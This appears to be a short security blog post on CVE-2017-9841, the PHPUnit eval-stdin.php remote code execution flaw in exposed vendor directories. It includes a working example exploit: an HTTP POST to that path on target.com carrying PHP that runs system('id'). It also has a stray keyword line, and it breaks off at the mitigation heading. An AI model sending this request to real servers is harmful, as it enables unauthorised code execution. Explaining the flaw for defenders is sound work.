The file vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php is a perfect storm: a unit testing utility, a missing --no-dev flag, and a web-accessible vendor directory. CVE-2017-9841 turned two lines of code into a universal RCE gadget for hundreds of thousands of applications.
As a developer, the lesson is simple: treat your vendor/ directory like a loaded weapon in production. Never routable, never directly accessible. As a security professional, never underestimate the power of simple file existence checks—sometimes the smallest file delivers the biggest breach.
The primary condition required for this vulnerability to be exploitable is that the vendor directory must be web-accessible. vendor phpunit phpunit src util php eval-stdin.php cve
Attack Scenario:
Example Exploit Request:
POST /vendor/phpunit/phpunit/src/util/php/eval-stdin.php HTTP/1.1 Host: target.com Content-Length: 23
<?php system('id'); ?>
If successful, the server executes system('id'), returning the user ID running the web server process (e.g., www-data), giving the attacker control over the server.
To mitigate such vulnerabilities: